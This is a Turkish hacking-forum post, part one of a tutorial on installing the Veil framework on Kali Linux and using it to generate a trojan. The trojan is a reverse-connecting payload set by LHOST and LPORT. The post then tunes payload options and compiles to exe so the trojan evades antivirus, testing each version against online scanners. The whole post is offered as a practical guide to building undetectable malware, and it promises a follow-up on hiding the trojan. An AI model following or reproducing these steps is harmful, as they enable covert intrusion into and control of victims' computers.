Veil ile Trojan Nasıl Oluşturulur ve Anti virüs Programları Aşılır Part 1

B

BÖRÜ'

Uzman üye
12 Mar 2019
1,195
1,115
JİGK

Herkese tekrardan merhaba arkadaşlar, bugün sizlere Veil ile nasıl trojan oluşturulur ve nasıl anti virüs atlatılır anlatmaya çalışacağım.

Veil'in amacı nedir?
Anti virüsleri atlatmak ve trojani anti-virüse yakalatmadan kurmayı sağlamaktır.

Veil nasıl kurulur?
Kali Linux'umuza giriş yapalım. Terminale girelim ve yönetici olalım. sudo su komutunu ve şifrenizi girip yönetici olun.
Daha sonrasında apt-get install Veil diyerek kurulumu başlatın.
İndirmeler olduktan sonra terminale veil yazıp y komutunu girin.İndirme ve kurulum işlemleri uzun sürebilir, bekleyiniz.
Python kurulumu gelecektir Next > Next diyerek kurulumu yapın.
Sonrasında yine bir programımızı kurmamızı isteyecektir. Next > Next diyerek tekrar kurulumumuzu yapalım.
Pycrypto kurulumunu yapmak isteyecektir tekrar Next > Next diyerek kurulumumuzu yapalım.
Dil seçiminde İngilizce yaparak kuruluma devam edelim.
Ruby'i yine Next > Next yaparak kuralım.
AutoIT programını tekrardan Next > Next yaparak kuralım ve finish diyerek bitirelim.
Kurulumlarımız bittiğinde bir hata mesajı ile karşılaşırsanız örneğin -
, hata kodunu kopyalıp yapıştırın ve enterleyin.

Kurulumları yapacaktır, veil yazarak hata alıp almadığınızı kontrol edin, tekrar hata alıyorsanız kodu kopyalayıp yapıştırın ve enterleyin.
Tekrar eksik - hatalı kurulumlarını yapacaktır.
Veil yazdığımızda toollar yükleniyorsa kurulumumuz tamamlanmıştır.
Kurulumumuz tamamlanmıştır, sırada nasıl basit bir trojan yapılır ona geçelim.

Veil ile Basit Trojan Oluşturma
Tekrardan sudo su komutu ve şifrenizle yönetici olalım.
Veil yazarak menüsüne girelim

use 1 komutuyla Evasion'u seçelim ve onları list komutuyla listeleyelim.

use 14 komutuyla 14. virüsümüzü seçelim.
Bir kaç ayar yapmanız lazım, LHOST ve LPORT gibi. Bunun için yeni bir terminal açıp yönetici olun (sudo su ve şifreniz)daha sonrasında ifconfig yazıp inet yazan yerin sağ tarafından ip adresinizi kopyalayın set LHOST ipadresiniz komutuyla değiştirin.

Daha sonrasında set LPORT 8080 veya 4444 ya da 5555 yaparak portunuzu değiştirin ve generate yazın.

İsim seçin ve virüs oluşturulmuştur, en sonunda size konumunu yazan yere gidin.
Hadi virüsümüzü kontrol sitelerine yükleyelim ve test edelim.


Aşağıda sonuçları gördünüz, virüsümüz basit olduğu için hemen hemene her site bir virüs buldu.

- Unable to create output file hatası alırsanız şu komutları giriniz;
sudo su
cd /var/lib/veil
chown root wine
cgrp root wine
-

Veil ile Anti Virüs Atlatma
Yukarıda çok basit bir virüs yazdığımız için bir çok anti virüs bu yazılımı buldu. Şimdi bu ayarları biraz daha oynayarak yeni bir virüs yazalım.

Architecture: Yazılımın mimarisini belirler.
Compile_to_exe:Yazılımın exe'ye çevrilmesini söyler.
Expire_payload: Devre dışı bırakmak istediğiniz özelliği girmenizi ister



sudo su > veil > use 1 > list > use 27 > set LPORT 4444 / set LHOST xxxxxxx / set compile_to_exe y ve generate yaptığımızda ise bu sonuçlara ulaşıyoruz.

Sonuçlar ise gördüğünüz şekildedir.


---

Use 14 ile yaptığım başka bir virüsümün virüs total sonuçları ise burada.

İçerisinde bir çok payload var,seçip kendinize göre sürekli olarak deneyin.Bu ayarları sürekli olarak oynayıp, virüs analizlerine sokarak en düşük riskli virüsünüzü hazır hale getirebilirsiniz. Konumuz bu kadardı okuduğunuz için teşekkür ederim.

Not: Eksiklerim - hatalarım olabilir, düzeltilmesi gereken bir yer olursa yorumlarda belirtiniz.
Part 2'de Trojanı nasıl gizleyebiliriz yöntemleriyle anlatacağım..




 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.